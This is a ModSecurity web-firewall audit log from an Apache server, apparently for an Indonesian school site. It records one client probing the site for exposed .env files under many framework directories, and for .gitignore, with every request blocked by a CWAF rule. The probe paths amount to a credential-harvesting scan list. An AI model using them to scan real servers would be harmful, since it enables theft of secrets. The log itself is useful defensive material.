Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c30454c-Z-- --50936e1a-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lQwAAANU 103.236.140.4 56880 103.236.140.4 8181 --50936e1a-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --50936e1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50936e1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965060925 755 (- - -) Stopwatch2: 1748448965060925 755; combined=269, p1=234, p2=0, p3=0, p4=0, p5=34, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50936e1a-Z-- --23303861-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lRAAAAM8 103.236.140.4 56882 103.236.140.4 8181 --23303861-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --23303861-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23303861-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965245138 677 (- - -) Stopwatch2: 1748448965245138 677; combined=264, p1=232, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23303861-Z-- --eabc8716-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lRgAAANc 103.236.140.4 56886 103.236.140.4 8181 --eabc8716-B-- GET /.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --eabc8716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eabc8716-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965429405 803 (- - -) Stopwatch2: 1748448965429405 803; combined=293, p1=257, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eabc8716-Z-- --29ef4828-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lSAAAANQ 103.236.140.4 56890 103.236.140.4 8181 --29ef4828-B-- GET /wp-content/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --29ef4828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29ef4828-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965801245 703 (- - -) Stopwatch2: 1748448965801245 703; combined=277, p1=244, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29ef4828-Z-- --dd5e143d-A-- [28/May/2025:23:16:05 +0700] aDc2xRwBHP_x2VCWa06lSQAAAMU 103.236.140.4 56892 103.236.140.4 8181 --dd5e143d-B-- GET /application/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --dd5e143d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd5e143d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448965985307 661 (- - -) Stopwatch2: 1748448965985307 661; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd5e143d-Z-- --92764215-A-- [28/May/2025:23:16:06 +0700] aDc2xhwBHP_x2VCWa06lSgAAAMQ 103.236.140.4 56894 103.236.140.4 8181 --92764215-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --92764215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92764215-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448966169497 679 (- - -) Stopwatch2: 1748448966169497 679; combined=264, p1=229, p2=0, p3=0, p4=0, p5=34, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92764215-Z-- --fa24ae0c-A-- [28/May/2025:23:16:06 +0700] aDc2xhwBHP_x2VCWa06lSwAAANg 103.236.140.4 56896 103.236.140.4 8181 --fa24ae0c-B-- GET /config/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --fa24ae0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa24ae0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448966353661 643 (- - -) Stopwatch2: 1748448966353661 643; combined=251, p1=218, p2=0, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa24ae0c-Z-- --31bde32c-A-- [28/May/2025:23:16:06 +0700] aDc2xhwBHP_x2VCWa06lTAAAANE 103.236.140.4 56898 103.236.140.4 8181 --31bde32c-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --31bde32c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31bde32c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448966537742 638 (- - -) Stopwatch2: 1748448966537742 638; combined=246, p1=215, p2=0, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31bde32c-Z-- --42e01d0c-A-- [28/May/2025:23:16:06 +0700] aDc2xhwBHP_x2VCWa06lTgAAAMI 103.236.140.4 56902 103.236.140.4 8181 --42e01d0c-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --42e01d0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42e01d0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448966908289 672 (- - -) Stopwatch2: 1748448966908289 672; combined=247, p1=216, p2=0, p3=0, p4=0, p5=31, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42e01d0c-Z-- --baf97566-A-- [28/May/2025:23:16:07 +0700] aDc2xxwBHP_x2VCWa06lTwAAAMk 103.236.140.4 56904 103.236.140.4 8181 --baf97566-B-- GET /library/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --baf97566-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --baf97566-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448967092446 672 (- - -) Stopwatch2: 1748448967092446 672; combined=256, p1=226, p2=0, p3=0, p4=0, p5=30, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --baf97566-Z-- --ee6eac5c-A-- [28/May/2025:23:16:07 +0700] aDc2xxwBHP_x2VCWa06lUAAAAMM 103.236.140.4 56906 103.236.140.4 8181 --ee6eac5c-B-- GET /nextjs-app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --ee6eac5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee6eac5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448967276539 661 (- - -) Stopwatch2: 1748448967276539 661; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee6eac5c-Z-- --2be96e3a-A-- [28/May/2025:23:16:07 +0700] aDc2xxwBHP_x2VCWa06lUQAAANY 103.236.140.4 56908 103.236.140.4 8181 --2be96e3a-B-- GET /node-api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2be96e3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2be96e3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448967460703 673 (- - -) Stopwatch2: 1748448967460703 673; combined=271, p1=224, p2=0, p3=0, p4=0, p5=46, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2be96e3a-Z-- --0471ec41-A-- [28/May/2025:23:16:07 +0700] aDc2xxwBHP_x2VCWa06lUgAAAM0 103.236.140.4 56910 103.236.140.4 8181 --0471ec41-B-- GET /vendor/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0471ec41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0471ec41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448967644786 679 (- - -) Stopwatch2: 1748448967644786 679; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0471ec41-Z-- --278ec20f-A-- [28/May/2025:23:16:08 +0700] aDc2yBwBHP_x2VCWa06lVAAAAMw 103.236.140.4 56914 103.236.140.4 8181 --278ec20f-B-- GET /backend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --278ec20f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --278ec20f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448968014887 683 (- - -) Stopwatch2: 1748448968014887 683; combined=254, p1=221, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --278ec20f-Z-- --4bbefa70-A-- [28/May/2025:23:16:08 +0700] aDc2yBwBHP_x2VCWa06lVgAAAM4 103.236.140.4 56918 103.236.140.4 8181 --4bbefa70-B-- GET /myproject/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --4bbefa70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bbefa70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448968385330 659 (- - -) Stopwatch2: 1748448968385330 659; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bbefa70-Z-- --357b8207-A-- [28/May/2025:23:16:08 +0700] aDc2yBwBHP_x2VCWa06lWAAAAM8 103.236.140.4 56924 103.236.140.4 8181 --357b8207-B-- GET /.envs/.production/.django HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --357b8207-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --357b8207-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448968569393 659 (- - -) Stopwatch2: 1748448968569393 659; combined=244, p1=218, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --357b8207-Z-- --e02f3600-A-- [28/May/2025:23:16:08 +0700] aDc2yBwBHP_x2VCWa06lWQAAANI 103.236.140.4 56926 103.236.140.4 8181 --e02f3600-B-- GET /react-app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e02f3600-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e02f3600-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448968753701 855 (- - -) Stopwatch2: 1748448968753701 855; combined=326, p1=287, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e02f3600-Z-- --2d203138-A-- [28/May/2025:23:16:09 +0700] aDc2yRwBHP_x2VCWa06lXAAAAMs 103.236.140.4 56934 103.236.140.4 8181 --2d203138-B-- GET /react-app/.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2d203138-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d203138-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448969001193 892 (- - -) Stopwatch2: 1748448969001193 892; combined=332, p1=295, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d203138-Z-- --c3b0d335-A-- [28/May/2025:23:16:11 +0700] aDc2yxwBHP_x2VCWa06lZgAAANU 103.236.140.4 56958 103.236.140.4 8181 --c3b0d335-B-- GET /.gitignore HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.107 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c3b0d335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3b0d335-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.gitignore" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748448971239383 683 (- - -) Stopwatch2: 1748448971239383 683; combined=256, p1=228, p2=0, p3=0, p4=0, p5=27, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
